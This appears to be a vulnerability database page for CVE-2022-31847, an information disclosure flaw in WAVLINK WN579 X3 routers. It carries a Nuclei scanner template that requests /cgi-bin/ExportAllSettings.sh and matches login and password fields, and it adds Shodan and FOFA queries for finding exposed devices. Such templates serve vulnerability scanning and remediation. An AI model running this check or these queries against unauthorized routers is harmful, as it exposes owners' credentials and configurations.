Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-31847
HistoryAug 14, 2022 - 8:18 p.m.

WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure

2022-08-1420:18:03
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.013 Low

EPSS

Percentile

85.7%

WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2022-31847

info:
  name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
  author: arafatansari
  severity: high
  description: |
    WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
  reference:
    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31847
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31847
    cwe-id: CWE-425
    epss-score: 0.01275
    epss-percentile: 0.85693
    cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wn579x3_firmware
    shodan-query:
      - http.html:"Wavlink"
      - http.html:"wavlink"
    fofa-query: body="wavlink"
  tags: cve,cve2022,wavlink,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Login='
          - 'Password='
          - 'Model='
          - 'AuthMode='
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022051ca158a854a3892f4ab0cc70c1a967505f58c4b4e29bb9d107c8fea626bc70b022100abd457544afe19bd3fc07706b22cd9fad2ee2c0095e5ab5c794f63030d443a8a:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.013 Low

EPSS

Percentile

85.7%

Related for NUCLEI:CVE-2022-31847